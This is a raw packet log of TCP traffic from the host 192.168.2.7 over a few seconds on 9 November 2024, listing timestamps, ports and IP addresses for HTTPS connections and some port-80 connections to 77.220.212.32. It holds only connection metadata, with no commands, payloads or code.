Nov 9, 2024 02:47:20.436266899 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.436326981 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.437478065 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.437542915 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.437756062 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.437763929 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.437781096 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.458318949 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.458383083 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.458561897 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.458650112 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.458664894 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.458671093 CET	49739	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.458677053 CET	443	49739	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.461550951 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.461575031 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.461688995 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.461843014 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.461849928 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.478303909 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.478312969 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.556771994 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.556983948 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.557034969 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.557482958 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.557509899 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.557524920 CET	49742	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.557529926 CET	443	49742	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.560129881 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.560163975 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.560306072 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.560370922 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.560378075 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.697105885 CET	49738	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.697133064 CET	443	49738	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.718928099 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.774135113 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.774151087 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.776134014 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.776204109 CET	443	49740	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:20.776273012 CET	49740	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:20.948312044 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.949672937 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.949711084 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:20.950145006 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:20.950165033 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.058996916 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.059607029 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.059633017 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.060090065 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.060094118 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.091496944 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:21.091943026 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:21.096400023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:21.096776962 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:21.096870899 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:21.096971989 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:21.096986055 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:21.101846933 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:21.101862907 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:21.106004000 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.106084108 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.106164932 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.109150887 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.109150887 CET	49743	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.109189034 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.109204054 CET	443	49743	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.113214970 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.113256931 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.113323927 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.113456964 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.113476992 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.140345097 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.140712023 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.140726089 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.141344070 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.141349077 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.190385103 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.190891981 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.190953016 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.191037893 CET	49744	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.191051006 CET	443	49744	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.195733070 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.195765018 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.195827007 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.196209908 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.196223974 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.202965975 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.203454971 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.203469992 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.204159975 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.204165936 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.275247097 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.275302887 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.275352001 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.276556969 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.276571035 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.276587963 CET	49745	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.276593924 CET	443	49745	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.285931110 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.285963058 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.286037922 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.286237001 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.286251068 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.334831953 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.334898949 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.334980965 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.335428953 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.335437059 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.335454941 CET	49746	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.335458994 CET	443	49746	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.345977068 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.346012115 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.346105099 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.346280098 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.346297026 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.380285025 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.402748108 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.402770042 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.403431892 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.403438091 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.408688068 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:21.408721924 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:21.408802032 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:21.410221100 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:21.410234928 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:21.530021906 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.530436993 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.530620098 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.530620098 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.530620098 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.533868074 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.533891916 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.533984900 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.534142017 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.534154892 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.837099075 CET	49747	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.837114096 CET	443	49747	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.868010998 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.868716955 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.868731022 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.869318962 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.869324923 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.886343002 CET	49756	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:21.886394024 CET	443	49756	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:21.886475086 CET	49756	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:21.886954069 CET	49756	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:21.886967897 CET	443	49756	172.217.18.14	192.168.2.7
Nov 9, 2024 02:47:21.913958073 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.914792061 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.914805889 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.915426016 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:21.915431023 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:21.937500954 CET	49698	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:21.940749884 CET	49757	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:21.940771103 CET	443	49757	104.98.116.138	192.168.2.7
Nov 9, 2024 02:47:21.940867901 CET	49757	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:21.941143036 CET	49757	443	192.168.2.7	104.98.116.138
Nov 9, 2024 02:47:21.941155910 CET	443	49757	104.98.116.138	192.168.2.7
Nov 9, 2024 02:47:21.942331076 CET	443	49698	104.98.116.138	192.168.2.7
Nov 9, 2024 02:47:22.001280069 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.001342058 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.001523972 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.001684904 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.001709938 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.001723051 CET	49750	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.001728058 CET	443	49750	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.004389048 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.004425049 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.004503012 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.004688978 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.004700899 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.015583038 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.016006947 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.016036034 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.016479969 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.016485929 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.042162895 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.042248011 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.042331934 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.042603016 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.042603016 CET	49751	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.042620897 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.042629957 CET	443	49751	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.044980049 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.045015097 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.045116901 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.045290947 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.045305014 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.083610058 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.085936069 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.085947990 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.086137056 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.086142063 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.155474901 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.155561924 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.155616045 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.155870914 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.155909061 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.155920982 CET	49752	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.155926943 CET	443	49752	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.158976078 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.159017086 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.159081936 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.159254074 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.159265995 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.215352058 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.215498924 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.215564966 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.215707064 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.215723038 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.215734005 CET	49753	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.215740919 CET	443	49753	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.218878984 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.218920946 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.218998909 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.219213963 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.219227076 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.264374018 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.265222073 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.265233040 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.266038895 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.266045094 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.295496941 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:22.295559883 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:22.394155979 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.394226074 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.394285917 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.395334005 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.395334005 CET	49755	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.395354033 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.395364046 CET	443	49755	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.406308889 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.406331062 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.406404018 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.417824984 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.417834997 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.418508053 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:22.423383951 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:22.463356018 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:22.463442087 CET	49756	443	192.168.2.7	172.217.18.14
Nov 9, 2024 02:47:22.483839989 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:22.483906031 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:22.485771894 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:22.485778093 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:22.486090899 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:22.540260077 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:22.748018980 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.749080896 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.749090910 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.750118971 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.750139952 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.783579111 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.784663916 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.784686089 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.785216093 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.785221100 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.877712965 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.877926111 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.877989054 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.878077030 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.878120899 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.878154039 CET	49758	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.878170013 CET	443	49758	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.880402088 CET	80	49749	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:22.880471945 CET	49749	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:22.881159067 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.881181955 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.881253004 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.881540060 CET	49764	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.881555080 CET	443	49764	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.902322054 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.903003931 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.903021097 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.903846025 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.903850079 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.915062904 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.915863037 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.915945053 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.915945053 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.915971041 CET	49759	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.915986061 CET	443	49759	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.918797016 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.918828011 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.918895006 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.919029951 CET	49765	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.919042110 CET	443	49765	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.965470076 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.978295088 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.978315115 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:22.979244947 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:22.979250908 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.034284115 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.036520958 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.036577940 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.037169933 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.037177086 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.037201881 CET	49760	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.037205935 CET	443	49760	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.051280022 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.051304102 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.051379919 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.054223061 CET	49766	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.054234028 CET	443	49766	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.108037949 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.108138084 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.108186960 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.123179913 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.123179913 CET	49761	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.123203993 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.123213053 CET	443	49761	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.125621080 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.125647068 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.125776052 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.134196043 CET	49767	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.134207964 CET	443	49767	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.148015022 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.148605108 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.148616076 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.149084091 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.149091005 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.205086946 CET	49754	443	192.168.2.7	4.245.163.56
Nov 9, 2024 02:47:23.251327038 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.276930094 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.276998997 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.277213097 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.277328014 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.277328014 CET	49762	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.277345896 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.277354956 CET	443	49762	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.280745983 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.280780077 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.281272888 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.281431913 CET	49769	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:23.281447887 CET	443	49769	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:23.560390949 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560432911 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560444117 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560478926 CET	443	49754	4.245.163.56	192.168.2.7
Nov 9, 2024 02:47:23.560492039 CET	443	49754	4.245.163.56	192.168.2.7
